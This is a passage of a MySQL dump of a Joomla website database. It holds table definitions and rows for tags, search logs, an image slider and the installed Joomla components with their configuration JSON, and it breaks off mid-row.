UNIQUE KEY `uc_ItemnameTagid` (`type_id`,`content_item_id`,`tag_id`),
KEY `idx_tag_type` (`tag_id`,`type_id`),
KEY `idx_date_id` (`tag_date`,`tag_id`),
KEY `idx_tag` (`tag_id`),
KEY `idx_type` (`type_id`),
KEY `idx_core_content_id` (`core_content_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Maps items from content tables to tags';
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_contentitem_tag_map`
--
LOCK TABLES `atlyh_contentitem_tag_map` WRITE;
/*!40000 ALTER TABLE `atlyh_contentitem_tag_map` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_contentitem_tag_map` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_core_log_searches`
--
DROP TABLE IF EXISTS `atlyh_core_log_searches`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_core_log_searches` (
`search_term` varchar(128) NOT NULL DEFAULT '',
`hits` int(10) unsigned NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_core_log_searches`
--
LOCK TABLES `atlyh_core_log_searches` WRITE;
/*!40000 ALTER TABLE `atlyh_core_log_searches` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_core_log_searches` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_djimageslider`
--
DROP TABLE IF EXISTS `atlyh_djimageslider`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_djimageslider` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`catid` int(10) unsigned NOT NULL DEFAULT 0,
`title` varchar(255) NOT NULL,
`alias` varchar(255) NOT NULL DEFAULT '',
`image` varchar(255) NOT NULL,
`description` text NOT NULL,
`published` tinyint(1) NOT NULL DEFAULT 0,
`publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`ordering` int(11) NOT NULL DEFAULT 0,
`params` text NOT NULL,
PRIMARY KEY (`id`),
KEY `catid` (`catid`,`published`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_djimageslider`
--
LOCK TABLES `atlyh_djimageslider` WRITE;
/*!40000 ALTER TABLE `atlyh_djimageslider` DISABLE KEYS */;
INSERT INTO `atlyh_djimageslider` VALUES (1,85,'Header 01','header-01','images/headers-01.jpg','',1,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'{\"link_type\":\"article\",\"link_menu\":\"490\",\"link_url\":\"\",\"link_article\":\"85\",\"link_target\":\"\"}'),(2,85,'Header 02','header-02','images/headers-02.jpg','',1,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'{\"link_type\":\"article\",\"link_menu\":\"490\",\"link_url\":\"\",\"link_article\":\"85\",\"link_target\":\"\"}'),(3,85,'Header 03','header-03','images/headers-03.jpg','',1,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'{\"link_type\":\"article\",\"link_menu\":\"490\",\"link_url\":\"\",\"link_article\":\"85\",\"link_target\":\"\"}');
/*!40000 ALTER TABLE `atlyh_djimageslider` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_extensions`
--
DROP TABLE IF EXISTS `atlyh_extensions`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_extensions` (
`extension_id` int(11) NOT NULL AUTO_INCREMENT,
`name` varchar(100) NOT NULL,
`type` varchar(20) NOT NULL,
`element` varchar(100) NOT NULL,
`folder` varchar(100) NOT NULL,
`client_id` tinyint(3) NOT NULL,
`enabled` tinyint(3) NOT NULL DEFAULT 1,
`access` int(10) unsigned NOT NULL DEFAULT 1,
`protected` tinyint(3) NOT NULL DEFAULT 0,
`manifest_cache` text NOT NULL,
`params` text NOT NULL,
`custom_data` text NOT NULL,
`system_data` text NOT NULL,
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`ordering` int(11) DEFAULT 0,
`state` int(11) DEFAULT 0,
PRIMARY KEY (`extension_id`),
KEY `element_clientid` (`element`,`client_id`),
KEY `element_folder_clientid` (`element`,`folder`,`client_id`),
KEY `extension` (`type`,`element`,`folder`,`client_id`)
) ENGINE=InnoDB AUTO_INCREMENT=10056 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_extensions`
--
LOCK TABLES `atlyh_extensions` WRITE;
/*!40000 ALTER TABLE `atlyh_extensions` DISABLE KEYS */;
INSERT INTO `atlyh_extensions` VALUES (1,'com_mailto','component','com_mailto','',0,1,1,1,'{\"name\":\"com_mailto\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MAILTO_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mailto\"}','','','',0,'0000-00-00 00:00:00',0,0),(2,'com_wrapper','component','com_wrapper','',0,1,1,1,'{\"name\":\"com_wrapper\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_WRAPPER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"wrapper\"}','','','',0,'0000-00-00 00:00:00',0,0),(3,'com_admin','component','com_admin','',1,1,1,1,'{\"name\":\"com_admin\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_ADMIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(4,'com_banners','component','com_banners','',1,1,1,0,'{\"name\":\"com_banners\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_BANNERS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"banners\"}','{\"purchase_type\":\"3\",\"track_impressions\":\"0\",\"track_clicks\":\"0\",\"metakey_prefix\":\"\",\"save_history\":\"1\",\"history_limit\":10}','','',0,'0000-00-00 00:00:00',0,0),(5,'com_cache','component','com_cache','',1,1,1,1,'{\"name\":\"com_cache\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CACHE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(6,'com_categories','component','com_categories','',1,1,1,1,'{\"name\":\"com_categories\",\"type\":\"component\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(7,'com_checkin','component','com_checkin','',1,1,1,1,'{\"name\":\"com_checkin\",\"type\":\"component\",\"creationDate\":\"Unknown\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CHECKIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(8,'com_contact','component','com_contact','',1,1,1,0,'{\"name\":\"com_contact\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}','{\"show_contact_category\":\"hide\",\"save_history\":\"1\",\"history_limit\":10,\"show_contact_list\":\"0\",\"presentation_style\":\"sliders\",\"show_name\":\"1\",\"show_position\":\"1\",\"show_email\":\"0\",\"show_street_address\":\"1\",\"show_suburb\":\"1\",\"show_state\":\"1\",\"show_postcode\":\"1\",\"show_country\":\"1\",\"show_telephone\":\"1\",\"show_mobile\":\"1\",\"show_fax\":\"1\",\"show_webpage\":\"1\",\"show_misc\":\"1\",\"show_image\":\"1\",\"image\":\"\",\"allow_vcard\":\"0\",\"show_articles\":\"0\",\"show_profile\":\"0\",\"show_links\":\"0\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"contact_icons\":\"0\",\"icon_address\":\"\",\"icon_email\":\"\",\"icon_telephone\":\"\",\"icon_mobile\":\"\",\"icon_fax\":\"\",\"icon_misc\":\"\",\"show_headings\":\"1\",\"show_position_headings\":\"1\",\"show_email_headings\":\"0\",\"show_telephone_headings\":\"1\",\"show_mobile_headings\":\"0\",\"show_fax_headings\":\"0\",\"allow_vcard_headings\":\"0\",\"show_suburb_headings\":\"1\",\"show_state_headings\":\"1\",\"show_country_headings\":\"1\",\"show_email_form\":\"1\",\"show_email_copy\":\"1\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"1\",\"custom_reply\":\"0\",\"redirect\":\"\",\"show_category_crumb\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(9,'com_cpanel','component','com_cpanel','',1,1,1,1,'{\"name\":\"com_cpanel\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CPANEL_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10,'com_installer','component','com_installer','',1,1,1,1,'{\"name\":\"com_installer\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_INSTALLER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(11,'com_languages','component','com_languages','',1,1,1,1,'{\"name\":\"com_languages\",\"type\":\"component\",\"creationDate\":\"2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\"}','{\"administrator\":\"en-GB\",\"site\":\"en-GB\"}','','',0,'0000-00-00 00:00:00',0,0),(12,'com_login','component','com_login','',1,1,1,1,'{\"name\":\"com_login\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_LOGIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(13,'com_media','component','com_media','',1,1,0,1,'{\"name\":\"com_media\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MEDIA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"media\"}','{\"upload_extensions\":\"bmp,csv,doc,gif,ico,jpg,jpeg,odg,odp,ods,odt,pdf,png,ppt,swf,txt,xcf,xls,BMP,CSV,DOC,GIF,ICO,JPG,JPEG,ODG,ODP,ODS,ODT,PDF,PNG,PPT,SWF,TXT,XCF,XLS\",\"upload_maxsize\":\"10\",\"file_path\":\"images\",\"image_path\":\"images\",\"restrict_uploads\":\"1\",\"allowed_media_usergroup\":\"3\",\"check_mime\":\"1\",\"image_extensions\":\"bmp,gif,jpg,png\",\"ignore_extensions\":\"\",\"upload_mime\":\"image\\/jpeg,image\\/gif,image\\/png,image\\/bmp,application\\/x-shockwave-flash,application\\/msword,application\\/excel,application\\/pdf,application\\/powerpoint,text\\/plain,application\\/x-zip\",\"upload_mime_illegal\":\"text\\/html\"}','','',0,'0000-00-00 00:00:00',0,0),(14,'com_menus','component','com_menus','',1,1,1,1,'{\"name\":\"com_menus\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MENUS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(15,'com_messages','component','com_messages','',1,1,1,1,'{\"name\":\"com_messages\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MESSAGES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(16,'com_modules','component','com_modules','',1,1,1,1,'{\"name\":\"com_modules\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MODULES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(17,'com_newsfeeds','component','com_newsfeeds','',1,1,1,0,'{\"name\":\"com_newsfeeds\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"newsfeeds\"}','{\"newsfeed_layout\":\"_:default\",\"save_history\":\"1\",\"history_limit\":5,\"show_feed_image\":\"1\",\"show_feed_description\":\"1\",\"show_item_description\":\"1\",\"feed_character_count\":\"0\",\"feed_display_order\":\"des\",\"float_first\":\"right\",\"float_second\":\"right\",\"show_tags\":\"1\",\"category_layout\":\"_:default\",\"show_category_title\":\"1\",\"show_description\":\"1\",\"show_description_image\":\"1\",\"maxLevel\":\"-1\",\"show_empty_categories\":\"0\",\"show_subcat_desc\":\"1\",\"show_cat_items\":\"1\",\"show_cat_tags\":\"1\",\"show_base_description\":\"1\",\"maxLevelcat\":\"-1\",\"show_empty_categories_cat\":\"0\",\"show_subcat_desc_cat\":\"1\",\"show_cat_items_cat\":\"1\",\"filter_field\":\"1\",\"show_pagination_limit\":\"1\",\"show_headings\":\"1\",\"show_articles\":\"0\",\"show_link\":\"1\",\"show_pagination\":\"1\",\"show_pagination_results\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(18,'com_plugins','component','com_plugins','',1,1,1,1,'{\"name\":\"com_plugins\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_PLUGINS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(19,'com_search','component','com_search','',1,1,1,0,'{\"name\":\"com_search\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_SEARCH_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"search\"}','{\"enabled\":\"0\",\"show_date\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(20,'com_templates','component','com_templates','',1,1,1,1,'{\"name\":\"com_templates\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_TEMPLATES_XML_DESCRIPTION\",\"group\":\"\"}','{\"template_positions_display\":\"0\",\"upload_limit\":\"2\",\"image_formats\":\"gif,bmp,jpg,jpeg,png\",\"source_formats\":\"txt,less,ini,xml,js,php,css\",\"font_formats\":\"woff,ttf,otf\",\"compressed_formats\":\"zip\"}','','',0,'0000-00-00 00:00:00',0,0),(22,'com_content','component','com_content','',1,1,0,1,'{\"name\":\"com_content\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','{\"article_layout\":\"_:default\",\"show_title\":\"1\",\"link_titles\":\"1\",\"show_intro\":\"1\",\"info_block_position\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_readmore\":\"1\",\"show_readmore_title\":\"0\",\"readmore_limit\":\"100\",\"show_tags\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"0\",\"show_publishing_options\":\"1\",\"show_article_options\":\"1\",\"save_history\":\"1\",\"history_limit\":10,\"show_urls_images_frontend\":\"0\",\"show_urls_images_backend\":\"1\",\"targeta\":0,\"targetb\":0,\"targetc\":0,\"float_intro\":\"left\",\"float_fulltext\":\"left\",\"category_layout\":\"_:blog\",\"show_category_heading_title_text\":\"1\",\"show_category_title\":\"0\",\"show_description\":\"0\",\"show_description_image\":\"0\",\"maxLevel\":\"0\",\"show_empty_categories\":\"0\",\"show_no_articles\":\"1\",\"show_subcat_desc\":\"0\",\"show_cat_num_articles\":\"0\",\"show_cat_tags\":\"1\",\"show_base_description\":\"1\",\"maxLevelcat\":\"-1\",\"show_empty_categories_cat\":\"0\",\"show_subcat_desc_cat\":\"0\",\"show_cat_num_articles_cat\":\"1\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"1\",\"num_links\":\"0\",\"multi_column_order\":\"0\",\"show_subcategory_content\":\"0\",\"show_pagination_limit\":\"1\",\"filter_field\":\"hide\",\"show_headings\":\"1\",\"list_show_date\":\"0\",\"date_format\":\"\",\"list_show_hits\":\"1\",\"list_show_author\":\"1\",\"orderby_pri\":\"order\",\"orderby_sec\":\"rdate\",\"order_date\":\"published\",\"show_pagination\":\"2\",\"show_pagination_results\":\"0\",\"show_featured\":\"show\",\"show_feed_link\":\"1\",\"feed_summary\":\"0\",\"feed_show_readmore\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(23,'com_config','component','com_config','',1,1,0,1,'{\"name\":\"com_config\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONFIG_XML_DESCRIPTION\",\"group\":\"\"}','{\"filters\":{\"1\":{\"filter_type\":\"NH\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"9\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"6\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"7\":{\"filter_type\":\"NONE\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"2\":{\"filter_type\":\"NH\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"3\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"4\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"5\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"8\":{\"filter_type\":\"NONE\",\"filter_tags\":\"\",\"filter_attributes\":\"\"}}}','','',0,'0000-00-00 00:00:00',0,0),(24,'com_redirect','component','com_redirect','',1,1,0,1,'{\"name\":\"com_redirect\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_REDIRECT_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(25,'com_users','component','com_users','',1,1,0,1,'{\"name\":\"com_users\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_USERS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"users\"}','{\"allowUserRegistration\":\"0\",\"new_usertype\":\"2\",\"guest_usergroup\":\"1\",\"sendpassword\":\"1\",\"useractivation\":\"1\",\"mail_to_admin\":\"1\",\"captcha\":\"\",\"frontend_userparams\":\"1\",\"site_language\":\"0\",\"change_login_name\":\"0\",\"reset_count\":\"10\",\"reset_time\":\"1\",\"minimum_length\":\"4\",\"minimum_integers\":\"0\",\"minimum_symbols\":\"0\",\"minimum_uppercase\":\"0\",\"save_history\":\"1\",\"history_limit\":5,\"mailSubjectPrefix\":\"\",\"mailBodySuffix\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(27,'com_finder','component','com_finder','',1,1,0,0,'{\"name\":\"com_finder\",\"type\":\"component\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_FINDER_XML_DESCRIPTION\",\"group\":\"\"}','{\"show_description\":\"1\",\"description_length\":255,\"allow_empty_query\":\"0\",\"show_url\":\"1\",\"show_advanced\":\"1\",\"expand_advanced\":\"0\",\"show_date_filters\":\"0\",\"highlight_terms\":\"1\",\"opensearch_name\":\"\",\"opensearch_description\":\"\",\"batch_size\":\"50\",\"memory_table_limit\":30000,\"title_multiplier\":\"1.7\",\"text_multiplier\":\"0.7\",\"meta_multiplier\":\"1.2\",\"path_multiplier\":\"2.0\",\"misc_multiplier\":\"0.3\",\"stemmer\":\"snowball\"}','','',0,'0000-00-00 00:00:00',0,0),(28,'com_joomlaupdate','component','com_joomlaupdate','',1,1,0,1,'{\"name\":\"com_joomlaupdate\",\"type\":\"component\",\"creationDate\":\"February 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(29,'com_tags','component','com_tags','',1,1,1,1,'{\"name\":\"com_tags\",\"type\":\"component\",\"creationDate\":\"December 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"COM_TAGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tags\"}','{\"tag_layout\":\"_:default\",\"save_history\":\"1\",\"history_limit\":5,\"show_tag_title\":\"0\",\"tag_list_show_tag_image\":\"0\",\"tag_list_show_tag_description\":\"0\",\"tag_list_image\":\"\",\"show_tag_num_items\":\"0\",\"tag_list_orderby\":\"title\",\"tag_list_orderby_direction\":\"ASC\",\"show_headings\":\"0\",\"tag_list_show_date\":\"0\",\"tag_list_show_item_image\":\"0\",\"tag_list_show_item_description\":\"0\",\"tag_list_item_maximum_characters\":0,\"return_any_or_all\":\"1\",\"include_children\":\"0\",\"maximum\":200,\"tag_list_language_filter\":\"all\",\"tags_layout\":\"_:default\",\"all_tags_orderby\":\"title\",\"all_tags_orderby_direction\":\"ASC\",\"all_tags_show_tag_image\":\"0\",\"all_tags_show_tag_descripion\":\"0\",\"all_tags_tag_maximum_characters\":20,\"all_tags_show_tag_hits\":\"0\",\"filter_field\":\"1\",\"show_pagination_limit\":\"1\",\"show_pagination\":\"2\",\"show_pagination_results\":\"1\",\"tag_field_ajax_mode\":\"1\",\"show_feed_link\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(30,'com_contenthistory','component','com_contenthistory','',1,1,1,0,'{\"name\":\"com_contenthistory\",\"type\":\"component\",\"creationDate\":\"May 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_CONTENTHISTORY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contenthistory\"}','','','',0,'0000-00-00 00:00:00',0,0),(31,'com_ajax','component','com_ajax','',1,1,1,0,'{\"name\":\"com_ajax\",\"type\":\"component\",\"creationDate\":\"August 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_AJAX_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"ajax\"}','','','',0,'0000-00-00 00:00:00',0,0),(32,'com_postinstall','component','com_postinstall','',1,1,1,1,'{\"name\":\"com_postinstall\",\"type\":\"component\",\"creationDate\":\"September 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2015 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_POSTINSTALL_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(101,'SimplePie','library','simplepie','',0,1,1,1,'{\"name\":\"SimplePie\",\"type\":\"library\",\"creationDate\":\"2004\",\"author\":\"SimplePie\",\"copyright\":\"Copyright (c) 2004-2009, Ryan Parman and Geoffrey Sneddon\",\"authorEmail\":\"\",\"authorUrl\":\"http:\\/\\/simplepie.org\\/\",\"version\":\"1.2\",\"description\":\"LIB_SIMPLEPIE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"simplepie\"}','','','',0,'0000-00-00 00:00:00',0,0),(102,'phputf8','library','phputf8','',0,1,1,1,'{\"name\":\"phputf8\",\"type\":\"library\",\"creationDate\":\"2006\",\"author\":\"Harry 